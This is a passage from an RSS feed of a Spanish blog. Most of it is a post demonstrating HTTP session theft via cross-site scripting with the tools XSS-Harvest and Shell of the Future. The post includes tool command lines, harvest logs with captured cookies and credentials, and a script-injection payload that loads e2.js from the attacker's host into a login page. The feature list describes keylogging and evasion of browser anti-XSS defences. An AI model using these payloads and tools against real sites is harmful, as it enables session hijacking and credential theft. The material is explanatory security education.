&lt;span class="apple-style-span"&gt;&lt;b&gt;Project Web:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;&lt;a href="http://www.honeynet.org/gsoc/slot5" target="_blank"&gt;&lt;span style="color: #114170;"&gt;http://www.honeynet.org/gsoc/slot5&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="apple-style-span"&gt;&lt;b&gt;TaintDroid:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="apple-style-span"&gt;&lt;a href="http://www.appanalysis.org/" target="_blank"&gt;&lt;span style="color: #114170;"&gt;http://www.appanalysis.org/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-5075801457422718645?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/sandbox-para-android.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-503321868162387773</guid><pubDate>Mon, 18 Jul 2011 14:30:00 +0000</pubDate><atom:updated>2011-07-18T20:47:57.779-04:00</atom:updated><title>Robo de sesiones HTTP mediante XSS</title><description>&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;Un ataque de &lt;a href="http://es.wikipedia.org/wiki/Cross-site_scripting"&gt;Cross Site Scripting&lt;/a&gt; (XSS) se produce cuando se inyecta código malicioso en forma de script en el lado del navegador, es decir, a través del cliente, en una página web en otro usuario final diferente que visita dicha página en cuestión. Este tipo de vulnerabilidad está muy extendida y puede afectar a cualquier aplicación web que utiliza la información de un usuario en la salida que genera a través del navegador Web, sin validación o codificación de los datos de entrada de la aplicación.&lt;/span&gt;&lt;/div&gt;&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;En múltiples ocasiones, no se le da la importancia que realmente tienen este tipo de ataques. Mediante una vulnerabilidad de XSS es relativamente sencillo enviar código malicioso a otro usuario desprevenido. El navegador del usuario objetivo no tiene forma de saber si lo que recibe es confiable y ejecuta el código malicioso al suponer que el script proviene de una fuente segura. Este script puede acceder a las cookies, los tokens de sesión u otra información sensible robando incluso la sesión. El código a inyectar y ejecutar puede ser VBscript, Javascript, etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Existen diferentes herramientas que son capaces de explotar vulnerabilidades de Cross Site Scripting para robar esas sesiones del usuario. Una de ellas es la recientemente publicada &lt;a href="http://www.thehackernews.com/2011/07/xss-harvest-harvesting-cross-site.html"&gt;XSS-Harverst&lt;/a&gt; que facilita enormemente realizar ataques de XSS y que intenta concienciar sobre el impacto real que una vulnerabilidad de este tipo puede tener en una página web.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;XSS-Harvest está escrito en lenguaje Perl y no ocupa más de 11 Kb. Con licencia GNU, no necesita de ningún servidor Web ni de motor de bases de datos para funcionar y, además, es multi-thread o multi-hilo, lo que le permite ejecutar tareas distintas a la vez y disponer de un gran rendimiento. Únicamente, al estar desarrollado en Perl, necesita de un intérprete del lenguaje independientemente de si es bajo Unix/Linux o Windows. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Entre las funcionalidades de XSS-Harvest destacan:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-family: Symbol; font-size: 10pt;"&gt;·&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;Los scripts de infección añaden detectores para los eventos importantes como las pulsaciones del teclado o los clicks del ratón en la página Web vulnerable y establecen la comunicación con el sistema XSS-Harvest.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-family: Symbol; font-size: 10pt;"&gt;·&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;Cualquier tecla que se pulse o cualquier click del ratón será analizado y enviado, de forma secreta, al servidor XSS-Harvest.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-family: Symbol; font-size: 10pt;"&gt;·&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;De forma opcional, es posible redireccionar la página Web vulnerable para mostrar otra página diferente en el mismo subdominio, como, por ejemplo, un formulario de acceso.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-family: Symbol; font-size: 10pt;"&gt;·&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;Realiza un seguimiento de las víctimas a través de las cookies para detectar futuras visitas a la página Web.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-family: Symbol; font-size: 10pt;"&gt;·&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;Cada víctima tiene un archivo diferente con el histórico correspondiente que contiene todos los eventos, cookies y pulsaciones del teclado que se derivan de su visita por la página. El fichero se encuentra localizado dentro de donde se ejecuta XSS-Harvest en el directorio "history" y con el formato loquesea.txt.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-family: Symbol; font-size: 10pt;"&gt;·&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;XSS-Harvest dispone de una consola que muestra los datos recibidos en tiempo real. - Funciona también con Internet Explorer 9 para ataques de Cross Site Scripting indirecto o reflejado, con Firefox 5, Google Chrome y con varios de los navegadores Web para dispositivos móviles como Safari y Android.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoListParagraph" style="mso-list: l0 level1 lfo1; text-indent: -18.0pt;"&gt;&lt;span style="font-family: Symbol; font-size: 10pt;"&gt;·&lt;span style="font: normal normal normal 7pt/normal 'Times New Roman';"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: 10pt;"&gt;Es capaz de evadir los métodos &lt;a href="http://www.microsoft.com/download/en/details.aspx?displaylang=en&amp;amp;id=325"&gt;antiXSS&lt;/a&gt; de los navegadores como, por ejemplo, la regulación de peticiones de Internet Explorer a la misma dirección (URL) cuando se extraen datos de un equipo o el &lt;a href="http://noscript.net/"&gt;plugin NoScript&lt;/a&gt; de Firefox. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;El funcionamiento, desde la línea de comandos, es muy sencillo y presenta diversas opciones con diferentes parámetros de ejecución (-l, -p y -r):&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;XSS-harvest.pl -l http://web.vulnerable/login.html&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Lo primero es encontrar una página Web que presente alguna vulnerabilidad de Cross Site Scripting. Se puede verificar que la vulnerabilidad existe insertando la sentencia&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="http://1.bp.blogspot.com/-cjWoqUApxYw/TiRCdQN-uDI/AAAAAAAAANU/2NQ46qSOrcs/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="228" src="http://1.bp.blogspot.com/-cjWoqUApxYw/TiRCdQN-uDI/AAAAAAAAANU/2NQ46qSOrcs/s400/1.jpg" style="cursor: move;" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;i&gt;&lt;span style="border-bottom-color: windowtext; border-bottom-style: none; border-bottom-width: 1pt; border-left-color: windowtext; border-left-style: none; border-left-width: 1pt; border-right-color: windowtext; border-right-style: none; border-right-width: 1pt; border-top-color: windowtext; border-top-style: none; border-top-width: 1pt; color: black; font-size: 10pt; padding-bottom: 0cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;"&gt;Fig 1. Confirmación de la vulneravilidad de XSS en la página de Hacktimes.com&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0cm 0cm 1.0pt 0cm;"&gt;&lt;div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0cm 0cm 1.0pt 0cm; padding: 0cm;"&gt;&lt;span style="font-size: 10pt;"&gt;El puerto por defecto por el que escucha el servidor XSS-harvest es el 80 (HTTP) pero es posible definir cualquier puerto con el parámetro -p. En este caso, se define el puerto 8080 (opción -l de listener y -p para especificar el puerto utilizado):&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0cm 0cm 1.0pt 0cm; padding: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;XSS-harvest.pl -l -p 8080 http://www.hacktimes.com/login.php&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;***************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;* XSS-Harvest Server *&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;***************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;[INFO] Starting Server....&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;[INFO] History directory found.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;2011/07/09-12:00:21 XSSHarvest::NetServer0 (type Net::Server::PreFork) starting! pid(11122)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;Using default listen value of 128&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0cm 0cm 1.0pt 0cm;"&gt;&lt;div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0cm 0cm 1.0pt 0cm; padding: 0cm;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;Binding to TCP port 8080 on host &lt;a href="http://www.hacktimes.com/login.php"&gt;http://www.hacktimes.com/login.php&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Revisando el archivo de texto creado con el histórico de los eventos detectados se observan cosas como las siguientes:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0cm 0cm 1.0pt 0cm;"&gt;&lt;div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0cm 0cm 1.0pt 0cm; padding: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;*************************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;[INFECTION] Sat Jul 9&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 12:01:11 2011&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;[IP] 192.168.1.23&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;[UID]&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 10pt;"&gt;[UA] Mozilla/50 (X11; Linux x86_32; rv:5.0) Gecko/20100101 Firefox/5.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;*************************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;*************************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;[PAGE_LOADED] Sat Jul 9 12:01:11 2011&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;[URL] http://www.hacktimes.com/infect.html&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;[COOKIES]&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;login=hacktimes&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;password=hacktimes&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;*************************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;*************************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;[DATA] Sat Jul 9 12:01:11 2011&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="EN-US" style="font-size: 10pt;"&gt;[CLICK RECEIVED]&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 10pt;"&gt;[COORDS] 111,11&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 10pt;"&gt;[TAGNAME]INPUT&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 10pt;"&gt;[NAME]fname&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 0cm 0cm 1.0pt 0cm;"&gt;&lt;div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-padding-alt: 0cm 0cm 1.0pt 0cm; padding: 0cm;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="font-size: 10pt;"&gt;*************************************&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Otra herramienta muy interesante y fácil de utilizar es Shell of the Future o SOTF (http://www.andlabs.org/tools/sotf/sotf.html) de la gente de Attack and Defense Labs que funciona bajo Windows. Al arrancar el programa se obtiene la siguiente pantalla donde lanzar y configurar la aplicación en modo proxy por el puerto por defecto 133&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;a href="http://3.bp.blogspot.com/-GhmYYcmcYc4/TiRCdzccsDI/AAAAAAAAANY/0sPNgLCocy8/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="172" src="http://3.bp.blogspot.com/-GhmYYcmcYc4/TiRCdzccsDI/AAAAAAAAANY/0sPNgLCocy8/s400/2.jpg" style="cursor: move;" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;i&gt;&lt;span style="border-bottom-color: windowtext; border-bottom-style: none; border-bottom-width: 1pt; border-left-color: windowtext; border-left-style: none; border-left-width: 1pt; border-right-color: windowtext; border-right-style: none; border-right-width: 1pt; border-top-color: windowtext; border-top-style: none; border-top-width: 1pt; color: black; font-size: 10pt; padding-bottom: 0cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;"&gt;Fig 2. Inicio y configuración de la aplicación Shell of the Future&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;Dispone de consola Web que es accesible configurando un proxy local (127.0.0.1 y el puerto 1337) en el navegador Web y cargando la siguiente dirección en la barra de direcciones &lt;a href="http://127.0.0.1/sotf.console"&gt;http://127.0.0.1/sotf.console&lt;/a&gt;:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;a href="http://2.bp.blogspot.com/-0oWo5PaEJLc/TiRCeJvQf0I/AAAAAAAAANc/bgIAUXZFUjw/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="122" src="http://2.bp.blogspot.com/-0oWo5PaEJLc/TiRCeJvQf0I/AAAAAAAAANc/bgIAUXZFUjw/s400/3.jpg" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;i&gt;&lt;span lang="EN-US" style="border-bottom-color: windowtext; border-bottom-style: none; border-bottom-width: 1pt; border-left-color: windowtext; border-left-style: none; border-left-width: 1pt; border-right-color: windowtext; border-right-style: none; border-right-width: 1pt; border-top-color: windowtext; border-top-style: none; border-top-width: 1pt; color: #333333; font-size: 10pt; padding-bottom: 0cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;"&gt;Fig 3. Consola de Shell of the Future&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="border-bottom-color: windowtext; border-bottom-style: none; border-bottom-width: 1pt; border-left-color: windowtext; border-left-style: none; border-left-width: 1pt; border-right-color: windowtext; border-right-style: none; border-right-width: 1pt; border-top-color: windowtext; border-top-style: none; border-top-width: 1pt; color: #333333; font-size: 10pt; padding-bottom: 0cm; padding-left: 0cm; padding-right: 0cm; padding-top: 0cm;"&gt;A continuación, en la página vulnerable de hacktimes de antes, se inyecta el código malicioso javascript que incluye la propia herramienta Shell of the Future (e1.js o e2.js). Se han incluido dos scripts, uno bastante elemental (e1.js) y otro más completo (e2.js) que incluye un link invisible hacia el servidor SOTF y un capturador de eventos "onmousemove" para controlar el cursor en todo momento:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: none; border-top: solid windowtext 1.0pt; mso-border-bottom-alt: solid windowtext .75pt; mso-border-top-alt: solid windowtext .75pt; mso-element: para-border-div; padding: 1.0pt 0cm 1.0pt 0cm;"&gt;&lt;div class="MsoNormal" style="border: none; mso-border-bottom-alt: solid windowtext .75pt; mso-border-top-alt: solid windowtext .75pt; mso-padding-alt: 1.0pt 0cm 1.0pt 0cm; padding: 0cm;"&gt;&lt;span class="apple-style-span"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="color: #333333; font-size: 10pt;"&gt;http://www.hacktimes.com/login.php=&lt;script src="http://127.0.0.1/e2.js"&gt;
&lt;/script&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10pt;"&gt;La consola ha cambiado y muestra la sesión que se acaba de robar del usuario desprevenido que está visitando la página vulnerable de hacktimes:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://3.bp.blogspot.com/-qDsufOTjXUw/TiRCepTDvcI/AAAAAAAAANg/9nV5gKs2B54/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="135" src="http://3.bp.blogspot.com/-qDsufOTjXUw/TiRCepTDvcI/AAAAAAAAANg/9nV5gKs2B54/s400/4.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;i style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-color: initial; border-style: initial; outline-color: initial; outline-style: initial; outline-width: 0px;"&gt;&lt;span style="border-bottom-color: windowtext; border-bottom-style: none; border-bottom-width: 1pt; border-left-color: windowtext; border-left-style: none; border-left-width: 1pt; border-right-color: windowtext; border-right-style: none; border-right-width: 1pt; border-top-color: windowtext; border-top-style: none; border-top-width: 1pt; color: #333333; font-size: 10pt; padding-bottom: 0cm; padding-left: 0cm; padding-right: 0cm; 